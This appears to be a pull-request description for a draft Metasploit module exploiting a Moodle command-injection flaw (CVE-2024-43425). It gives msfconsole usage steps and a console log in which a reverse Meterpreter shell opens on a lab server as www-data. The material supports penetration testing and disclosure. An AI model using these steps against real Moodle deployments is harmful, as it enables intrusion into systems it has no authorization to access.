rapid7/metasploit-framework
# Moodle RCE (CVE-2024-43425) Module

This is a new module which exploits a command injection vulnerability in Moodle (CVE-2024-43425) to obtain remote code execution. By default, the application will run in the context of www-data, so only a limited shell can be obtained.

Valid credentials are required to exploit this vulnerability. Moreover, the user must be authorized to either add a new or modify an existing quiz, in order to reach the vulnerable function and trigger the bug. User roles that fall into this category include `Teacher` and `Administrator`, but might differ depending on the specific deployment and configuration.

## Verification Steps

1. Download the application from [here](https://download.moodle.org/releases/legacy/).
2. Deploy it by following the vendor's [installation guide](https://docs.moodle.org/404/en/Step-by-step_Installation_Guide_for_Ubuntu).
3. Create a new course with a quiz.
4. Create a new user (e.g., of role `Teacher`) and assign it to the previously created course.
5. Authenticate as the new user, confirm that you can access the course, and can add new questions.
6. Obtain the course ID. Can be retrieved from the URL when the course is selected (e.g., `<IP>/moodle/course/view.php?id=3`).
7. Obtain the course module ID (CMID). Can be retrieved from the URL when the "Add question" button is pressed within a quiz of a course (e.g., `IP>/moodle/mod/quiz/edit.php?cmid=4`).
8. Start `msfconsole`
9.  `use exploit/linux/http/moodle_rce`
10. `set USERNAME <USER>`
11. `set PASSWORD <PASSWORD>`
12. `set CMID <ID>`
13. `set COURSEID <ID>`
14. `set RHOSTS <IP>`
15. `set LHOST <IP>`
16. `exploit`

```
msf6 exploit(linux/http/moodle_rce) > exploit 

[*] Started reverse TCP handler on 192.168.217.128:4444 
[*] Obtaining MoodleSession and logintoken...
[+] Server reachable.
[*] Authenticating as testuser...
[*] Successfully authenticated.
[*] Obtaining sesskey, courseContextId, and category...
[*] Injecting command...
[*] Sending stage (3045380 bytes) to 192.168.217.141
[*] Meterpreter session 1 opened (192.168.217.128:4444 -> 192.168.217.141:37152) at 2024-09-01 18:19:44 -0400
[-] Exploit aborted due to failure: unreachable: Failed to receive a reply from the server.
[*] Exploit completed, but no session was created.

msf6 exploit(linux/http/moodle_rce) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer     : 192.168.217.141
OS           : Ubuntu 24.04 (Linux 6.8.0-41-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

meterpreter > getuid 
Server username: www-data
```

## Notes
Obtaining the course ID and course module ID has to be done manually by the user running the module. While it could be automated, there are too many variables to consider (multiple courses, multiple quizzes, specific configurations of these, specific permissions assigned to the given user, etc.). Since it is fairly trivial to obtain these from the address bar while browsing Moodle, it shouldn't be a big burden for the user.

I played around with different timeouts and similar properties, but the current draft of the module always results in a shell that isn't directly caught when the module is executed:
```
[*] Meterpreter session 1 opened (192.168.217.128:4444 -> 192.168.217.141:37152) at 2024-09-01 18:19:44 -0400
[-] Exploit aborted due to failure: unreachable: Failed to receive a reply from the server.
```

While it's not a big issue to manually select the session, it would be nicer if it gets caught while running the module. Is there a specific MSF directive or property I can add to make this more reliable in my module?

Currently no `check` method is implemented, as I didn't see an endpoint that returns the version details to an unauthenticated user.

I'm leaving it as a draft for now, as I still want to do some cleanup and improvements, as well as incorporate some of the feedback that I got in other PRs that apply here too. However, the current code should work in the majority of cases as is, in case someone would like to test it already.
